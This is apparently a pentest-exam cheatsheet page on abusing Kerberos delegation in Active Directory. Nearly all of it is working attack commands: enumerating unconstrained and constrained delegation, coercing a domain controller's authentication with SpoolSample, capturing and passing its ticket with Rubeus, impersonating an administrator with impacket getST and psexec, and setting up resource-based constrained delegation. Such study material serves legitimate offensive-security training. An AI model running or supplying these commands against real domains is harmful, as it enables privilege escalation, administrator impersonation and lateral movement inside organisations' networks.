Constrained & Unconstrained Delegation
Active Directory
Overview
Abusing Kerberos delegation for privilege escalation and lateral movement.
0
Exercises
0
Flashcards
1
Mind Maps
Cheatsheet
Find Delegation
# Unconstrained Get-DomainComputer -Unconstrained # Find unconstrained delegation # Constrained Get-DomainUser -TrustedToAuth # Find constrained delegation (users) Get-DomainComputer -TrustedToAuth # Find constrained delegation (computers)
Unconstrained Delegation
# Coerce auth (PrinterBug) SpoolSample.exe DC attacker-machine # Trigger auth from DC # Capture TGT with Rubeus Rubeus.exe monitor /interval:1 # Monitor for TGTs # Use DC TGT Rubeus.exe ptt /ticket:base64ticket # Pass-the-Ticket
Constrained Delegation
# Request service ticket getST.py -spn cifs/target -impersonate administrator domain/user:pass # Abuse constrained delegation export KRB5CCNAME=admin.ccache # Set ticket impacket-psexec -k -no-pass target # Auth with ticket
Resource-Based (RBCD)
# Need GenericWrite on target impacket-rbcd domain/user:pass -action write -delegate-to TARGET$ -delegate-from YOURPC$ # Configure RBCD getST.py -spn cifs/target -impersonate admin domain/yourpc$:pass # Abuse RBCD to impersonate admin
Command Examples
Common Pitfalls
- Need local admin on unconstrained host
- Constrained delegation has service restrictions
- RBCD requires write access to target
Exam Survival Tips
- Check BloodHound for delegation
- PrinterBug/PetitPotam for unconstrained
- RBCD is powerful with write access